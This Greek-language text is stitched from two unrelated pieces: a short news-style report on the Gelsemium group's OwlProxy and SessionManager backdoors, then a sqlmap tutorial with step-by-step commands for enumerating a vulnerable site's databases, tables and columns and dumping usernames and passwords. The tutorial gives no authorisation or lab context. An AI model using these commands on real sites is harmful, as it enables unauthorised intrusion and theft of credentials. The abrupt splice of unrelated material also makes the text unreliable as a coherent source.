Στην τελευταία εκστρατεία, ο δράστης της απειλής ανέπτυξε ένα εκτελέσιμο πρόγραμμα που αποθήκευσε ένα ενσωματωμένο DLL (wmipd.dll) στο δίσκο του παραβιασμένου συστήματος και δημιούργησε μια υπηρεσία που το εκτελεί.
Το DLL είναι μια παραλλαγή του OwlProxy, το οποίο δημιουργεί μια υπηρεσία HTTP που παρακολουθεί τις εισερχόμενες αιτήσεις για συγκεκριμένα μοτίβα URL που κρύβουν εντολές.
Οι ερευνητές λένε ότι τα προϊόντα ασφαλείας στο σύστημα-στόχο εμπόδισαν την εκτέλεση του OwlProxy, οπότε οι επιτιθέμενοι επέστρεψαν στη χρήση του EarthWorm.
Το δεύτερο προσαρμοσμένο εμφύτευμα που σχετίζεται με το Gelsemium είναι το SessionManager, μια κερκόπορτα IIS που η Kaspersky συνέδεσε με την ομάδα απειλών το περασμένο καλοκαίρι.
Το δείγμα της πρόσφατης επίθεσης παρακολουθούσε τις εισερχόμενες αιτήσεις HTTP, αναζητώντας ένα συγκεκριμένο πεδίο Cookie που μεταφέρει εντολές για εκτέλεση στον υπολογιστή.
Οι εντολές αυτές αφορούν τη μεταφόρτωση αρχείων στον ή από τον διακομιστή C2, την εκτέλεση εντολών, την εκκίνηση εφαρμογών ή τη διαμεσολάβηση για συνδέσεις σε πρόσθετα συστήματα.
Η λειτουργία μεσολάβησης στο πλαίσιο των OwlProxy και SessionManager δείχνει την πρόθεση των φορέων απειλής να χρησιμοποιήσουν τον παραβιασμένο διακομιστή ως πύλη για την επικοινωνία με άλλα συστήματα στο δίκτυο-στόχο.
Εύρεση των βάσεων δεδομένων –> sqlmap.py -u <URL> --dbs
Αποκτήστε πρόσβαση στη βάση δεδομένων που θέλετε –> sqlmap.py -u <URL> --tables -D <όνομα βάσης δεδομένων>
Τραβήξτε τις στήλες των πινάκων –> sqlmap.py -u <URL> -columns -Τ <όνομα πίνακα>
Βρείτε τα δεδομένα απο τα tables–> sqlmap.py -u <URL> --columns -Τ <όνομα πίνακα> -C <ονόματα των στηλών> (serperate με κόμματα EG: a_username, a_password) --dump
Ας ξεκινήσουμε.
Δεν θα μπω στη διαδικασία να σας εξηγήσω πως μπορούμε να βρούμε μια σελίδα ευάλωτη σε sql injection η πως κάνουμε εγκατάσταση του Sqlmap.
1)Δίνουμε την εντολή
sqlmap.py -u vuln url
Όπου vuln url βάζουμε το δικό μας.
Αν είναι ευπαθής η σελίδα θα δείτε κάτι σαν το παρακάτω.
2)Πάμε να βρούμε την βάση δεδομένων, αυτο μπορούμε να το κάνουμε με την εντολή
sqlmap.py -u <vuln url> --dbs
Και σαν αποτέλεσμα παίρνουμε την βάση δεδομένων της σελίδας.
3)Τώρα θα πρέπει να πάρουμε πρόσβαση το οποίο είναι εύκολο! Διαγράψετε –dbs και πληκτρολογήστε –tables -D και, στη συνέχεια, τη βάση δεδομένων που θέλετε.
Τι κάναμε ακριβώς; το –tables λέει στο sqlmap οτι ψάχνουμε για πίνακες και το -D (πρέπει να είναι κεφαλαία!) λέει στο sqlmap οτι θέλουμε να ανοίξουμε αυτή τη βάση δεδομένων.
Αν όλα πάνε καλα θα πρέπει να μοιάζει με την παραπάνω εικόνα
4)Τώρα θα πρέπει να ανοίξετε τους πίνακες που βρήκε για να διαβάσουμε τα δεδομένα, usernames,passwords κλπ
Διαγράψτε το –tables και αντικαταστήστε το με –columns το οποίο ενημερώνει τον χρήστη οτι θέλουμε να ανοίξουμε τις στήλες στη συνέχεια, πληκτρολογήστε -Τ (ΚΕΦΑΛΑΙΑ!) Και, στη συνέχεια, το πίνακα που θέλετε να ανοίξετε!
Και το αποτέλεσμα
Βλέπουμε δύο πράγματα ενδιαφερων, db_username και db_password.
Για άλλη μια φορά, προσθέστε -C βάση δεδομένων, βάση δεδομένων αντικατάστασή τους με αυτά που θέλετε και, στη συνέχεια, –dump στο τέλος, αυτό λέει στο sqlmap οτι θέλουμε να έχουν πρόσβαση σε δύο από αυτές τις στήλες.
